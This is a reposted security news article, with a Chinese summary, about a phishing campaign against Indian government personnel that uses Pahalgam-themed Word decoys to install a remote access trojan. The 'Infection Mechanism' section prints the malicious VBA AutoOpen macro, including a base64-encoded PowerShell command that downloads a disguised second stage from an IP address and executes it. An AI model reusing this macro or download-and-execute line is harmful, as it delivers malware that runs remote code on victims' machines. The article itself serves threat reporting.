针对印度政府人员的复杂钓鱼攻击:Pahalgam 攻击事件诱饵
网络间谍活动针对印度政府人员展开,利用伪装成官方文件的钓鱼邮件传播恶意软件。攻击者通过Pahalgam事件作为诱饵,诱导用户启用宏以部署远程访问木马(RAT),窃取敏感数据。该活动被认为由高度专业的国家支持型威胁行为者实施。 2025-5-5 14:2:28 Author: cybersecuritynews.com(查看原文) 阅读量:2 收藏

Hackers Weaponizing Pahalgam Attack Themed Decoys to Attack Indian Government Personnel

In a sophisticated cyber espionage campaign, threat actors are actively targeting Indian government personnel using decoy documents referencing the recent Pahalgam attack.

The malicious campaign, discovered in early May 2025, utilizes spear-phishing emails with attachments designed to exploit recipients’ interest in security developments related to the incident.

These emails appear to originate from legitimate government agencies, making them particularly convincing to unsuspecting officials seeking information about the security situation.

Google News

Initial analysis reveals that the attacks begin with Microsoft Word documents containing embedded macros that, when enabled, deploy a multi-stage malware payload.

Content of the document is masked (Source – Seqrite)

The documents, disguised as official briefings or intelligence reports on the Pahalgam situation, prompt users to “Enable Content” to view supposedly protected information, triggering the execution of hidden malicious code.

The attackers have crafted their lures with considerable attention to detail, including authentic-looking letterheads and formatting consistent with official government communications.

Seqrite researchers identified the campaign after detecting unusual network traffic patterns from government networks.

Their investigation uncovered a previously undocumented Remote Access Trojan (RAT) that establishes persistence and communicates with command-and-control servers reportedly linked to a nation-state threat actor with a history of targeting Indian government institutions.

The researchers noted that this campaign appears to be the work of a highly sophisticated adversary with deep knowledge of Indian government operations.

The malware campaign appears specifically tailored to compromise sensitive government information, with particular focus on defense, intelligence, and law enforcement agencies.

Security experts assess the operation as highly targeted, suggesting a deliberate intelligence-gathering mission rather than opportunistic cybercrime.

The timing of the campaign, coinciding with the aftermath of the Pahalgam incident, indicates the attackers’ strategic approach to exploiting current events.

Infection Mechanism

The infection chain begins when victims open the malicious document, typically named “Pahalgam_Incident_Report_Confidential.docx”. When macros are enabled, the document executes obfuscated VBA code that decodes and executes a PowerShell command:-

Sub AutoOpen()
    Dim str As String
    str = "powershell.exe -nop -w hidden -e JGM9KChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC40NS4xMDUvYy5wbmcnKTtpZXggJGM="
    Shell str, vbHide
End Sub
Obfuscated Payload (Source – Seqrite)

This PowerShell command downloads and executes a second-stage payload disguised as a PNG image file, establishing persistence through scheduled tasks and Registry modifications.

The malware then collects system information and begins exfiltrating sensitive data while attempting to move laterally within government networks.

Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.


文章来源: https://cybersecuritynews.com/hackers-weaponizing-pahalgam-attack-themed-decoys/
如有侵权请联系:admin#unsafe.sh